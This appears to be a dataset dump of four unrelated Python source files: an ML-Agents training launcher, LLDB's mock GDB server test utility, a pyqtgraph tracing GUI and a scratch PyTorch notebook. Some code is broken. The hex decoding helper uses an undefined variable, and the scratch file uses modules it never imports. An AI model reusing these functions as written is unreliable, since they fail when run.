source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
learn.py
|
# # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
import yaml
from docopt import docopt
from typing import Any, Callable, Dict, Optional
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers import MetaCurriculumError, MetaCurriculum
from mlagents.envs import UnityEnvironment
from mlagents.envs.sampler_class import SamplerManager
from mlagents.envs.exception import UnityEnvironmentException, SamplerException
from mlagents.envs.base_unity_environment import BaseUnityEnvironment
from mlagents.envs.subprocess_env_manager import SubprocessEnvManager
def run_training(
sub_id: int, run_seed: int, run_options: Dict[str, Any], process_queue: Queue
) -> None:
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
docker_target_name = (
run_options["--docker-target-name"]
if run_options["--docker-target-name"] != "None"
else None
)
# General parameters
env_path = run_options["--env"] if run_options["--env"] != "None" else None
run_id = run_options["--run-id"]
load_model = run_options["--load"]
train_model = run_options["--train"]
save_freq = int(run_options["--save-freq"])
keep_checkpoints = int(run_options["--keep-checkpoints"])
base_port = int(run_options["--base-port"])
num_envs = int(run_options["--num-envs"])
curriculum_folder = (
run_options["--curriculum"] if run_options["--curriculum"] != "None" else None
)
lesson = int(run_options["--lesson"])
fast_simulation = not bool(run_options["--slow"])
no_graphics = run_options["--no-graphics"]
trainer_config_path = run_options["<trainer-config-path>"]
sampler_file_path = (
run_options["--sampler"] if run_options["--sampler"] != "None" else None
)
# Recognize and use docker volume if one is passed as an argument
if not docker_target_name:
model_path = "./models/{run_id}-{sub_id}".format(run_id=run_id, sub_id=sub_id)
summaries_dir = "./summaries"
else:
trainer_config_path = "/{docker_target_name}/{trainer_config_path}".format(
docker_target_name=docker_target_name,
trainer_config_path=trainer_config_path,
)
if curriculum_folder is not None:
curriculum_folder = "/{docker_target_name}/{curriculum_folder}".format(
docker_target_name=docker_target_name,
curriculum_folder=curriculum_folder,
)
model_path = "/{docker_target_name}/models/{run_id}-{sub_id}".format(
docker_target_name=docker_target_name, run_id=run_id, sub_id=sub_id
)
summaries_dir = "/{docker_target_name}/summaries".format(
docker_target_name=docker_target_name
)
trainer_config = load_config(trainer_config_path)
env_factory = create_environment_factory(
env_path,
docker_target_name,
no_graphics,
run_seed,
base_port + (sub_id * num_envs),
)
env = SubprocessEnvManager(env_factory, num_envs)
maybe_meta_curriculum = try_create_meta_curriculum(curriculum_folder, env)
sampler_manager, resampling_interval = create_sampler_manager(
sampler_file_path, env.reset_parameters, run_seed
)
# Create controller and begin training.
tc = TrainerController(
model_path,
summaries_dir,
run_id + "-" + str(sub_id),
save_freq,
maybe_meta_curriculum,
load_model,
train_model,
keep_checkpoints,
lesson,
run_seed,
fast_simulation,
sampler_manager,
resampling_interval,
)
# Signal that environment has been launched.
process_queue.put(True)
# Begin training
tc.start_learning(env, trainer_config)
def create_sampler_manager(sampler_file_path, env_reset_params, run_seed=None):
sampler_config = None
resample_interval = None
if sampler_file_path is not None:
sampler_config = load_config(sampler_file_path)
if ("resampling-interval") in sampler_config:
# Filter arguments that do not exist in the environment
resample_interval = sampler_config.pop("resampling-interval")
if (resample_interval <= 0) or (not isinstance(resample_interval, int)):
raise SamplerException(
"Specified resampling-interval is not valid. Please provide"
" a positive integer value for resampling-interval"
)
else:
raise SamplerException(
"Resampling interval was not specified in the sampler file."
" Please specify it with the 'resampling-interval' key in the sampler config file."
)
sampler_manager = SamplerManager(sampler_config, run_seed)
return sampler_manager, resample_interval
def try_create_meta_curriculum(
curriculum_folder: Optional[str], env: SubprocessEnvManager
) -> Optional[MetaCurriculum]:
if curriculum_folder is None:
return None
else:
meta_curriculum = MetaCurriculum(curriculum_folder, env.reset_parameters)
if meta_curriculum:
for brain_name in meta_curriculum.brains_to_curriculums.keys():
if brain_name not in env.external_brains.keys():
raise MetaCurriculumError(
"One of the curricula "
"defined in " + curriculum_folder + " "
"does not have a corresponding "
"Brain. Check that the "
"curriculum file has the same "
"name as the Brain "
"whose curriculum it defines."
)
return meta_curriculum
def prepare_for_docker_run(docker_target_name, env_path):
for f in glob.glob(
"/{docker_target_name}/*".format(docker_target_name=docker_target_name)
):
if env_path in f:
try:
b = os.path.basename(f)
if os.path.isdir(f):
shutil.copytree(f, "/ml-agents/{b}".format(b=b))
else:
src_f = "/{docker_target_name}/{b}".format(
docker_target_name=docker_target_name, b=b
)
dst_f = "/ml-agents/{b}".format(b=b)
shutil.copyfile(src_f, dst_f)
os.chmod(dst_f, 0o775) # Make executable
except Exception as e:
logging.getLogger("mlagents.trainers").info(e)
env_path = "/ml-agents/{env_path}".format(env_path=env_path)
return env_path
def load_config(trainer_config_path: str) -> Dict[str, Any]:
try:
with open(trainer_config_path) as data_file:
trainer_config = yaml.safe_load(data_file)
return trainer_config
except IOError:
raise UnityEnvironmentException(
"Parameter file could not be found " "at {}.".format(trainer_config_path)
)
except UnicodeDecodeError:
raise UnityEnvironmentException(
"There was an error decoding "
"Trainer Config from this path : {}".format(trainer_config_path)
)
def create_environment_factory(
env_path: str,
docker_target_name: str,
no_graphics: bool,
seed: Optional[int],
start_port: int,
) -> Callable[[int], BaseUnityEnvironment]:
if env_path is not None:
# Strip out executable extensions if passed
env_path = (
env_path.strip()
.replace(".app", "")
.replace(".exe", "")
.replace(".x86_64", "")
.replace(".x86", "")
)
docker_training = docker_target_name is not None
if docker_training and env_path is not None:
"""
Comments for future maintenance:
Some OS/VM instances (e.g. COS GCP Image) mount filesystems
with COS flag which prevents execution of the Unity scene,
to get around this, we will copy the executable into the
container.
"""
# Navigate in docker path and find env_path and copy it.
env_path = prepare_for_docker_run(docker_target_name, env_path)
seed_count = 10000
seed_pool = [np.random.randint(0, seed_count) for _ in range(seed_count)]
def create_unity_environment(worker_id: int) -> UnityEnvironment:
env_seed = seed
if not env_seed:
env_seed = seed_pool[worker_id % len(seed_pool)]
return UnityEnvironment(
file_name=env_path,
worker_id=worker_id,
seed=env_seed,
docker_training=docker_training,
no_graphics=no_graphics,
base_port=start_port,
)
return create_unity_environment
def main():
try:
print(
"""
▄▄▄▓▓▓▓
╓▓▓▓▓▓▓█▓▓▓▓▓
,▄▄▄m▀▀▀' ,▓▓▓▀▓▓▄ ▓▓▓ ▓▓▌
▄▓▓▓▀' ▄▓▓▀ ▓▓▓ ▄▄ ▄▄ ,▄▄ ▄▄▄▄ ,▄▄ ▄▓▓▌▄ ▄▄▄ ,▄▄
▄▓▓▓▀ ▄▓▓▀ ▐▓▓▌ ▓▓▌ ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌ ╒▓▓▌
▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓ ▓▀ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▄ ▓▓▌
▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄ ▓▓ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▐▓▓
^█▓▓▓ ▀▓▓▄ ▐▓▓▌ ▓▓▓▓▄▓▓▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▓▄ ▓▓▓▓`
'▀▓▓▓▄ ^▓▓▓ ▓▓▓ └▀▀▀▀ ▀▀ ^▀▀ `▀▀ `▀▀ '▀▀ ▐▓▓▌
▀▀▀▀▓▄▄▄ ▓▓▓▓▓▓, ▓▓▓▓▀
`▀█▓▓▓▓▓▓▓▓▓▌
¬`▀▀▀█▓
"""
)
except Exception:
print("\n\n\tUnity Technologies\n")
_USAGE = """
Usage:
mlagents-learn <trainer-config-path> [options]
mlagents-learn --help
Options:
--env=<file> Name of the Unity executable [default: None].
--curriculum=<directory> Curriculum json directory for environment [default: None].
--sampler=<file> Reset parameter yaml file for environment [default: None].
--keep-checkpoints=<n> How many model checkpoints to keep [default: 5].
--lesson=<n> Start learning from this lesson [default: 0].
--load Whether to load the model or randomly initialize [default: False].
--run-id=<path> The directory name for model and summary statistics [default: ppo].
--num-runs=<n> Number of concurrent training sessions [default: 1].
--save-freq=<n> Frequency at which to save model [default: 50000].
--seed=<n> Random seed used for training [default: -1].
--slow Whether to run the game at training speed [default: False].
--train Whether to train model, or only run inference [default: False].
--base-port=<n> Base port for environment communication [default: 5005].
--num-envs=<n> Number of parallel environments to use for training [default: 1]
--docker-target-name=<dt> Docker volume to store training-specific files [default: None].
--no-graphics Whether to run the environment in no-graphics mode [default: False].
--debug Whether to run ML-Agents in debug mode with detailed logging [default: False].
"""
options = docopt(_USAGE)
trainer_logger = logging.getLogger("mlagents.trainers")
env_logger = logging.getLogger("mlagents.envs")
trainer_logger.info(options)
if options["--debug"]:
trainer_logger.setLevel("DEBUG")
env_logger.setLevel("DEBUG")
num_runs = int(options["--num-runs"])
seed = int(options["--seed"])
if options["--env"] == "None" and num_runs > 1:
raise TrainerError(
"It is not possible to launch more than one concurrent training session "
"when training from the editor."
)
jobs = []
run_seed = seed
if num_runs == 1:
if seed == -1:
run_seed = np.random.randint(0, 10000)
run_training(0, run_seed, options, Queue())
else:
for i in range(num_runs):
if seed == -1:
run_seed = np.random.randint(0, 10000)
process_queue = Queue()
p = Process(target=run_training, args=(i, run_seed, options, process_queue))
jobs.append(p)
p.start()
# Wait for signal that environment has successfully launched
while process_queue.get() is not True:
continue
# Wait for jobs to complete. Otherwise we'll have an extra
# unhandled KeyboardInterrupt if we end early.
try:
for job in jobs:
job.join()
except KeyboardInterrupt:
pass
# For python debugger to directly run this script
if __name__ == "__main__":
main()
|
gdbclientutils.py
|
import ctypes
import errno
import io
import threading
import socket
import traceback
from lldbsuite.support import seven
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
Most bytes are sent through as-is, but $, #, and { are escaped by writing
a { followed by the original byte mod 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
hex_len = len(hex_bytes)
while i < hex_len - 1:
out += chr(int(hex_bytes[i:i + 2]), 16)
i += 2
return out
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
class RESPONSE_DISCONNECT: pass
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet.startswith("vCont;c"):
return self.vCont(packet)
if packet[0] == "A":
return self.A(packet)
if packet[0] == "D":
return self.D(packet)
if packet[0] == "g":
return self.readRegisters()
if packet[0] == "G":
# Gxxxxxxxxxxx
# Gxxxxxxxxxxx;thread:1234;
return self.writeRegisters(packet[1:].split(';')[0])
if packet[0] == "p":
regnum = packet[1:].split(';')[0]
return self.readRegister(int(regnum, 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qsThreadInfo":
return self.qsThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet == "s":
return self.haltReason()
if packet[0] == "H":
tid = packet[2:]
if "." in tid:
assert tid.startswith("p")
# TODO: do we want to do anything with PID?
tid = tid.split(".", 1)[1]
return self.selectThread(packet[1], int(tid, 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
if packet.startswith("qThreadStopInfo"):
threadnum = int (packet[15:], 16)
return self.threadStopInfo(threadnum)
if packet == "QThreadSuffixSupported":
return self.QThreadSuffixSupported()
if packet == "QListThreadsInStopReply":
return self.QListThreadsInStopReply()
if packet.startswith("qMemoryRegionInfo:"):
return self.qMemoryRegionInfo(int(packet.split(':')[1], 16))
if packet == "qQueryGDBServer":
return self.qQueryGDBServer()
if packet == "qHostInfo":
return self.qHostInfo()
if packet == "qGetWorkingDir":
return self.qGetWorkingDir()
if packet == "qOffsets":
return self.qOffsets();
if packet == "qsProcessInfo":
return self.qsProcessInfo()
if packet.startswith("qfProcessInfo"):
return self.qfProcessInfo(packet)
if packet.startswith("qPathComplete:"):
return self.qPathComplete()
if packet.startswith("vFile:"):
return self.vFile(packet)
if packet.startswith("vRun;"):
return self.vRun(packet)
if packet.startswith("qLaunchSuccess"):
return self.qLaunchSuccess()
if packet.startswith("QEnvironment:"):
return self.QEnvironment(packet)
if packet.startswith("QEnvironmentHexEncoded:"):
return self.QEnvironmentHexEncoded(packet)
if packet.startswith("qRegisterInfo"):
regnum = int(packet[len("qRegisterInfo"):], 16)
return self.qRegisterInfo(regnum)
if packet == "k":
return self.k()
return self.other(packet)
def qsProcessInfo(self):
return "E04"
def qfProcessInfo(self, packet):
return "E04"
def qGetWorkingDir(self):
return "2f"
def qOffsets(self):
return ""
def qHostInfo(self):
return "ptrsize:8;endian:little;"
def qQueryGDBServer(self):
return "E04"
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def vCont(self, packet):
raise self.UnexpectedPacketException()
def A(self, packet):
return ""
def D(self, packet):
return "OK"
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qsThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def threadStopInfo(self, threadnum):
return ""
def other(self, packet):
# empty string means unsupported
return ""
def QThreadSuffixSupported(self):
return ""
def QListThreadsInStopReply(self):
return ""
def qMemoryRegionInfo(self, addr):
return ""
def qPathComplete(self):
return ""
def vFile(self, packet):
return ""
def vRun(self, packet):
return ""
def qLaunchSuccess(self):
return ""
def QEnvironment(self, packet):
return "OK"
def QEnvironmentHexEncoded(self, packet):
return "OK"
def qRegisterInfo(self, num):
return ""
def k(self):
return ["W01", self.RESPONSE_DISCONNECT]
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class ServerSocket:
"""
A wrapper class for TCP or pty-based server.
"""
def get_connect_address(self):
"""Get address for the client to connect to."""
def get_connect_url(self):
"""Get URL suitable for process connect command."""
def close_server(self):
"""Close all resources used by the server."""
def accept(self):
"""Accept a single client connection to the server."""
def close_connection(self):
"""Close all resources used by the accepted connection."""
def recv(self):
"""Receive a data packet from the connected client."""
def sendall(self, data):
"""Send the data to the connected client."""
class TCPServerSocket(ServerSocket):
def __init__(self):
family, type, proto, _, addr = socket.getaddrinfo(
"localhost", 0, proto=socket.IPPROTO_TCP)[0]
self._server_socket = socket.socket(family, type, proto)
self._connection = None
self._server_socket.bind(addr)
self._server_socket.listen(1)
def get_connect_address(self):
return "[{}]:{}".format(*self._server_socket.getsockname())
def get_connect_url(self):
return "connect://" + self.get_connect_address()
def close_server(self):
self._server_socket.close()
def accept(self):
assert self._connection is None
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._server_socket.settimeout(30.0)
client, client_addr = self._server_socket.accept()
# The connected client inherits its timeout from self._socket,
# but we'll use a blocking socket for the client
client.settimeout(None)
self._connection = client
def close_connection(self):
assert self._connection is not None
self._connection.close()
self._connection = None
def recv(self):
assert self._connection is not None
return self._connection.recv(4096)
def sendall(self, data):
assert self._connection is not None
return self._connection.sendall(data)
class PtyServerSocket(ServerSocket):
def __init__(self):
import pty
import tty
primary, secondary = pty.openpty()
tty.setraw(primary)
self._primary = io.FileIO(primary, 'r+b')
self._secondary = io.FileIO(secondary, 'r+b')
def get_connect_address(self):
libc = ctypes.CDLL(None)
libc.ptsname.argtypes = (ctypes.c_int,)
libc.ptsname.restype = ctypes.c_char_p
return libc.ptsname(self._primary.fileno()).decode()
def get_connect_url(self):
return "serial://" + self.get_connect_address()
def close_server(self):
self._secondary.close()
self._primary.close()
def recv(self):
try:
return self._primary.read(4096)
except OSError as e:
# closing the pty results in EIO on Linux, convert it to EOF
if e.errno == errno.EIO:
return b''
raise
def sendall(self, data):
return self._primary.write(data)
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
_socket = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, socket):
self._socket = socket
self.responder = MockGDBServerResponder()
def start(self):
# Start a thread that waits for a client connection.
self._thread = threading.Thread(target=self.run)
self._thread.start()
def stop(self):
self._thread.join()
self._thread = None
def get_connect_address(self):
return self._socket.get_connect_address()
def get_connect_url(self):
return self._socket.get_connect_url()
def run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
self._socket.accept()
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
try:
while True:
data = seven.bitcast_to_string(self._socket.recv())
if data is None or len(data) == 0:
break
self._receive(data)
except self.TerminateConnectionException:
pass
except Exception as e:
print("An exception happened when receiving the response from the gdb server. Closing the client...")
traceback.print_exc()
finally:
self._socket.close_connection()
self._socket.close_server()
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
its data is removed form self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _sendPacket(self, packet):
self._socket.sendall(seven.bitcast_to_bytes(frame_packet(packet)))
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._socket.sendall(seven.bitcast_to_bytes('+'))
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
if not isinstance(response, list):
response = [response]
for part in response:
if part is MockGDBServerResponder.RESPONSE_DISCONNECT:
raise self.TerminateConnectionException()
self._sendPacket(part)
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class TerminateConnectionException(Exception):
pass
class InvalidPacketException(Exception):
pass
|
gui_pyqtgraph.py
|
# -*- coding: utf-8 -*-
'''
GUI for quicktracer
'''
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import sys
import os
import threading
import json
import traceback
import importlib.util
from displays import default_display_classes
ANIMATION_UPDATE_INTERVAL = 10 # ms
# Globals
key_to_display = {}
# Protocol constants
KEY = 'k'
VALUE = 'v'
TIME = 't'
CUSTOM_DISPLAY = 'custom_display'
VIEW_BOX = 'view_box'
def read_input():
global key_to_display
try:
while True:
try:
line = input()
except EOFError as e:
return
message = json.loads(line)
key = message[KEY]
view_box = message.get(VIEW_BOX, None)
if key not in key_to_display:
plot = create_plot(message)
plot.set_view_box_id(view_box)
plot.set_title(view_box or key)
plot.add_value(message)
key_to_display[key] = plot
else:
key_to_display[key].add_value(message)
except Exception as e:
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
sys.exit(-1)
def create_plot(message):
global key_to_display
key = message[KEY]
value = message[VALUE]
custom_display = message.get(CUSTOM_DISPLAY, None)
if custom_display:
module_path, display_class_name = custom_display
sys.path.append(os.path.dirname(module_path))
spec = importlib.util.spec_from_file_location(display_class_name, module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
display_class = getattr(module, display_class_name)
return display_class()
for display_class in default_display_classes:
if display_class.accepts_value(value):
display = display_class()
return display
raise Exception('unexpected datatype. key={} value={}: '.format(key, repr(value)))
class NonFocusStealingGraphicsWindow(pg.GraphicsWindow):
def show(self):
self.setAttribute(98) # Qt::WA_ShowWithoutActivating
super().show()
def main():
app = QtGui.QApplication([])
win = NonFocusStealingGraphicsWindow(title='quicktracer')
win.setGeometry(0, 30, 600, 600)
threading.Thread(target=read_input, daemon=True).start()
def update():
global key_to_display
try:
for key in sorted(key_to_display):
key_to_display[key].render_with_init(win)
except Exception as e:
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(10)
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
if __name__ == '__main__':
main()
|
python_pg.py
|
# %%
# to test impots
import sys
from typing import List, NewType, Any
for path in sys.path:
print(path)
# %%
def __path_bn_layer_for_functional_eval(self, module, input):
for attr_str in dir(module):
target_attr = getattr(module, attr_str)
print(target_attr)
if type(target_attr) == torch.nn.BatchNorm1d:
target_attr.track_running_stats = True
target_attr.running_mean = input.mean()
target_attr.running_var = input.var()
target_attr.num_batches_tracked = torch.tensor(0, dtype=torch.long)
# "recurse" iterate through immediate child modules. Note, the recursion is done by our code no need to use named_modules()
for name, immediate_child_module in module.named_children():
self._path_bn_layer_for_functional_eval(immediate_child_module, name)
# %%
import time
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
file_handler = logging.FileHandler('employee.log')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
class Employee:
"""A sample Employee class"""
def __init__(self, first, last):
self.first = first
self.last = last
logger.info('Created Employee: {} - {}'.format(self.fullname, self.email))
@property
def email(self):
return '{}.{}@email.com'.format(self.first, self.last)
@property
def fullname(self):
return '{} {}'.format(self.first, self.last)
emp_1 = Employee('John', 'Smith')
emp_2 = Employee('Corey', 'Schafer')
emp_3 = Employee('Jane', 'Doe')
######## END OF EMPLOYEE LOGGING EXAMPLE
def report_times(start, verbose=False):
'''
How much time has passed since the time "start"
:param float start: the number representing start (usually time.time())
'''
meta_str = ''
## REPORT TIMES
start_time = start
seconds = (time.time() - start_time)
minutes = seconds / 60
hours = minutes / 60
if verbose:
print(f"--- {seconds} {'seconds ' + meta_str} ---")
print(f"--- {minutes} {'minutes ' + meta_str} ---")
print(f"--- {hours} {'hours ' + meta_str} ---")
print('\a')
##
msg = f'time passed: hours:{hours}, minutes={minutes}, seconds={seconds}'
return msg, seconds, minutes, hours
#
# def params_in_comp_graph():
# import torch
# import torch.nn as nn
# # from torchviz import make_dot
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# # x.requires_grad = True # uncomment to put in computation graph
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l, params=dict(mdl.named_parameters()))
# params = dict(mdl.named_parameters())
# # params = {**params, 'x':x}
# make_dot(l, params=params).render('data/debug/test_img_l', format='png')
def check_if_tensor_is_detached():
a = torch.tensor([2.0], requires_grad=True)
b = a.detach()
b.requires_grad = True
print(a == b)
print(a is b)
print(a)
print(b)
la = (5.0 - a) ** 2
la.backward()
print(f'a.grad = {a.grad}')
lb = (6.0 - b) ** 2
lb.backward()
print(f'b.grad = {b.grad}')
def deep_copy_issue():
params = OrderedDict([('fc1', nn.Linear(in_features=3, out_features=1))])
mdl0 = nn.Sequential(params)
mdl1 = copy.deepcopy(mdl0)
print(id(mdl0))
print(mdl0)
print(id(mdl1))
print(mdl1)
# my update
mdl1.fc1.weight = nn.Parameter(mdl1.fc1.weight + 1)
mdl2 = copy.deepcopy(mdl1)
print(id(mdl2))
print(mdl2)
def download_mini_imagenet():
# download mini-imagenet automatically
import torch
import torch.nn as nn
import torchvision.datasets.utils as utils
from torchvision.datasets.utils import download_and_extract_archive
from torchvision.datasets.utils import download_file_from_google_drive
## download mini-imagenet
# url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
filename = 'miniImagenet.tgz'
root = '~/tmp/' # dir to place downloaded file in
download_file_from_google_drive(file_id, root, filename)
def extract():
from torchvision.datasets.utils import extract_archive
from_path = os.path.expanduser('~/Downloads/miniImagenet.tgz')
extract_archive(from_path)
def download_and_extract_miniImagenet(root):
import os
from torchvision.datasets.utils import download_file_from_google_drive, extract_archive
## download miniImagenet
# url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
filename = 'miniImagenet.tgz'
download_file_from_google_drive(file_id, root, filename)
fpath = os.path.join(root, filename) # this is what download_file_from_google_drive does
## extract downloaded dataset
from_path = os.path.expanduser(fpath)
extract_archive(from_path)
## remove the zip file
os.remove(from_path)
def torch_concat():
import torch
g1 = torch.randn(3, 3)
g2 = torch.randn(3, 3)
#
# def inner_loop1():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# qry_loss.backward()
#
